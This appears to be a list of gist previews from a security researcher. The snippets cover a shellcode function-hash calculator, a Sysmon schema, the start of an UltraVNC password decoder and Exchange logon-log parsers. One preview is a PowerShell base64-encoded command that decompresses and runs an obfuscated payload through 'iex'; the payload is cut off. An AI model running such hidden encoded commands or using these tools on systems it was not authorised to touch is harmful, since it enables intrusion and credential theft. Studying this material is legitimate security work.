leechristensen

#include <windows.h>
#include <winternl.h>
#include <stdio.h>

// Calculates function hashes for use in Matt Graeber's C to Shellcode project
// See http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html
//
// Usage: PrintFunctionHashes.exe user32.dll | findstr /i messagebox

// This compiles to a ROR instruction

leechristensen

PS C:\> $Command = 'powershell.exe  -E "cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAagBWAEQATgBhAHQAdABBAEUATAA0AGIALwBBADYARABFAEcAUgBGAHIAUwBWAE4ANgBNAFgARgBoADkAWgB1ADAAMABBAGMAVABLADIAMgBCACsASABEAFcAcABwAFkAUwAxAGMANwBZAG4AZgBVADEASQBTACsAZQAwAGUAVwAwADAAQgBQAHUAVwBqAEYAegBIAHkALwBLAFIAOAA3AGgAQQBWADgAcQBPAHUAOABHAEgANwB6AE4AYgBaADcARABDAHQAOABzAE4ANgB5AEoAUQA4AFgANQBjAHEANQAyADcAYQBqAHcAQwByADUAaQBjAEcAagB1ADcANwBTAHQAWABQAEoAYgBOAG0AWQBzAEUAVgBlAG4ARgAvADkAegBkAHUASwBhAHMAeAAyAFgAYgA5ADMAdABvAEwASQBoAHUAWABCADMAeQB3AHcAdQBQAFcAOAA0AFEAQQAzAHkARQB0AHEAVwArAFAAcgBPACsAdABSAFoAZQA4AHYASQBOACsAWQBHAEkAcwBtADkASgBEAGYAbQB4AGIAaABoAC8AWABYAFYAOQBOAEoATwBwAHcAdgBJAEIAMAA4AHoAdQBmAC8ANAAyAFMALwBQAGUAMwBMAHIANwAxAG4AMgA2AEkAVwBBAFEAegBVAGIAVABIADgA

leechristensen

<!DOCTYPE Sysmon [<!ELEMENT Sysmon (EventFiltering|HashAlgorithms)*>
<!ATTLIST Sysmon schemaversion CDATA #REQUIRED>
<!ELEMENT EventFiltering (ProcessCreate|FileCreateTime|NetworkConnect|ProcessTerminate|DriverLoad|ImageLoad|CreateRemoteThread|RawAccessRead)*>
<!ELEMENT ProcessCreate (UtcTime|ProcessGuid|ProcessId|Image|CommandLine|CurrentDirectory|User|LogonGuid|LogonId|TerminalSessionId|IntegrityLevel|Hashes|ParentProcessGuid|ParentProcessId|ParentImage|ParentCommandLine)*>
<!ATTLIST ProcessCreate onmatch (include|exclude) #IMPLIED>
<!ATTLIST ProcessCreate default (include|exclude) #IMPLIED>
<!ELEMENT UtcTime (#PCDATA)*>
<!ATTLIST UtcTime condition CDATA "is">
<!ELEMENT ProcessGuid (#PCDATA)*>
<!ATTLIST ProcessGuid condition CDATA "is">

leechristensen

using System;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Text;

namespace UltraVNCPasswordDecoder
{
    class Program
    {
        public static string ByteArrayToHex(byte[] bytes)

leechristensen

$EWSLogPath = "$($env:exchangeinstallpath)\Logging\EWS\"
$EWSLogPath = "."
$NumberOfLogs = 10
$RecentLogs = ls "$EWSLogPath\*.log" | sort LastWriteTime -Descending | select -First $NumberOfLogs -ExpandProperty FullName

$UserLogons = @()
foreach($Log in $RecentLogs)
{
    $LogFile = Get-Content $Log | select -Skip 5

leechristensen

# Author: Lee Christensen (@tifkin_)

#$RPClientLogDir = "$($env:exchangeinstallpath)\Logging\RPC Client Access\"
$RPClientLogDir = "."
$NumberOfLogs = 100
$RecentLogs = ls "$RPClientLogDir\*.log" | sort LastWriteTime -Descending | select -First $NumberOfLogs -ExpandProperty FullName

$UserLogons = @()
foreach($Log in $RecentLogs)
{

leechristensen

Pulled it using strings.exe..... :)

<!DOCTYPE Sysmon [<!ELEMENT Sysmon (EventFiltering|HashAlgorithms)*>
<!ATTLIST Sysmon schemaversion CDATA #REQUIRED>
<!ELEMENT EventFiltering (ProcessCreate|FileCreateTime|NetworkConnect|ProcessTerminate|DriverLoad|ImageLoad|CreateRemoteThread)*>
<!ELEMENT ProcessCreate (SequenceNumber|UtcTime|ProcessGuid|ProcessId|Image|CommandLine|CurrentDirectory|User|LogonGuid|LogonId|TerminalSessionId|IntegrityLevel|Hashes|ParentProcessGuid|ParentProcessId|ParentImage|ParentCommandLine)*>
<!ATTLIST ProcessCreate onmatch (include|exclude) #IMPLIED>
<!ATTLIST ProcessCreate default (include|exclude) #IMPLIED>
<!ELEMENT SequenceNumber (#PCDATA)*>
<!ATTLIST SequenceNumber condition CDATA "is">